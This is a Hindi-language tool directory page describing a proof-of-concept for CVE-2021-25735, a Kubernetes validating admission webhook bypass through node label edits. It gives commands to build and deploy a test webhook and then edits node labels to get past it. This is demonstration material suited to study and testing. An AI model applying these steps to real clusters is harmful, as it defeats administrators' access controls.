Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-25735 — सीवीई-2021-25735 के लिए एक्सप्लॉइट जो नोड लेबल हेरफेर के माध्यम से Kubernetes Validating Admission Webhook बायपास को प्रदर्शित करता है, साथ में तैनात करने योग्य Docker कंटेनर और वेबहुक पंजीकरण स्क्रिप्ट। | Kitploit
उपकरण/GitHubGitHub/darryk10/cve-2021-25735
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगक्लाउड सुरक्षा
GitHubdarryk10/cve-2021-25735

CVE-2021-25735

सीवीई-2021-25735 के लिए एक्सप्लॉइट जो नोड लेबल हेरफेर के माध्यम से Kubernetes Validating Admission Webhook बायपास को प्रदर्शित करता है, साथ में तैनात करने योग्य Docker कंटेनर और वेबहुक पंजीकरण स्क्रिप्ट।

रिपॉजिटरी देखें
17525 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-25735

CVE-2021-25735 का शोषण: Kubernetes Validating Admission Webhook Bypass

असुरक्षित वातावरण सेट करें

आइए स्क्रिप्ट gencerts.sh को चलाकर शुरू करें ताकि TLS प्रमाणपत्र और कुंजियाँ उत्पन्न हों।
bash gencerts.sh

एडमिशन कंट्रोलर को डिप्लॉय करने के लिए आपको Docker कंटेनर इमेज को स्थानीय रूप से बनाना, टैग करना और इसे अपने Dockerhub पर नीचे दिए गए कमांड का उपयोग करके पुश करना होगा।
docker login
docker build -t validationwebhook:1.0 .
docker tag validationwebhook:1.0 darryk/dev:1.0
docker push darryk/dev:1.0

अब आप बनाई गई इमेज को Node.js एप्लिकेशन के साथ अपने K8s क्लस्टर में डिप्लॉय कर सकते हैं। webhook-deploy.yaml आपके क्लस्टर में सभी आवश्यक घटकों को डिप्लॉय करेगा।
kubectl apply -f webhook-deploy.yaml

आइए अब अपने वेबहुक को Kubernetes API Server के साथ रजिस्टर करें। ऐसा करने के लिए, हम पहले बनाई गई ca.crt फ़ाइल का Base64 बनाते हैं और webhook-registration.yaml के अंदर CA_BUNDLE को बदलते हैं।
cat ca.crt | base64

अंत में, हम वेबहुक को Kubernetes API Server के साथ रजिस्टर करेंगे।
kubectl apply -f webhook-registration.yaml

CVE-2021-25735 का शोषण

हम नोड लेबल में बदलाव करते हैं और एक नया लेबल जोड़ते हैं।
kubectl edit nodes ip-172-20-61-82.ec2.internal

root@kitploit:~
  labels:  
    test: test  
    changeAllowed: "false"

चूंकि ChangeAllowed को "false" पर सेट किया गया है, हमें निम्नलिखित त्रुटि मिलती है:

error: nodes "ip-172-20-46-130.ec2.internal" could not be patched: admission webhook "validationwebhook.validationwebhook.svc" denied the request: Validation failed You can run kubectl replace -f /tmp/kubectl-edit-irc64.yaml to try this update again.

यदि हम निम्नलिखित परिवर्तन करके नोड को संशोधित करने का पुनः प्रयास करते हैं:

root@kitploit:~
  labels:  
    test: test  
    changeAllowed: "true"

इस मामले में, संपादन कार्रवाई स्वीकार कर ली गई है, जो एडमिशन कंट्रोलर को बायपास कर रही है।

टूल डाउनलोड करें